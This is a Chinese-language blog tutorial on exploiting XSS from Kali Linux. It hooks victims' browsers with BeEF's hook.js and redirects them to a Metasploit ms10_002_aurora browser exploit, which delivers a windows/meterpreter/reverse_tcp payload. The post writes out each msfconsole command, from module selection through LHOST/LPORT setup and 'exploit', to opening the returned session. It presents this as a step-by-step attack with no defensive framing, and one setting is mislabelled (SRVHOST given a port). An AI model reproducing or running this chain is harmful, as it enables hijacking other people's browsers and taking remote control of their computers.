最新消息:

Xss漏洞之Kali下的完美利用

Kali Linux Eternal 3140浏览 0评论

00×01

首先,我们来到beef安装目录下,启动 ./beef 。这里就不做过多讲解了!成功启动后,我们可以在启动界面找到 UI 的登录地址及 hook.js 的文件地址。如下:

Hook URL: http://192.168.80.136:3000/hook.js

UI URL: http://192.168.80.136:3000/ui/panel

20160816153904

00×02

接着,我们来设置下MSF的利用配置!

我们选择使用MSF中的浏览器利用模块:

use windows/browser/ms10_002_aurora

设置PATLOAD反弹连接信息:

set PAYLOAD windows/meterpreter/reverse_tcp

20160816112842

set SRVHOST 192.168.80.136

set SRVHOST 7777

set URIPATH /

set LHOST 192.168.80.136

set LPORT 4444

20160816113004

00×03

开始侦听并利用:

exploit

20160816113117

00×04

我们通过之前的UI地址登录到 beef 的浏览器界面,可以看到当我们的 hook 被成功触发后,我们就能得到对方客户端的控制权!此时我们再利用 beef 强大的 URL 跳转功能,将其跳转到我们事先设置好的 URL 上,我们就可能获取到对方机器的控制权!

20160816154049

00×05

当成功利用后,我们可以在Kali的MSF终端下,反弹回一个会话:

sessions -i

会话连接为:192.168.80.136:4444—>192.168.80.126:1959

20160816113922

00×06

接着,我们选择会话 1 ,与其建立连接即可!

sessions -i 1

20160816113953

转载请注明:即刻安全 » Xss漏洞之Kali下的完美利用

您必须 登录 才能发表评论!

网友最新评论 (1)

  1. 谢谢分享
    qhao9112周前 (04-14)


合作伙伴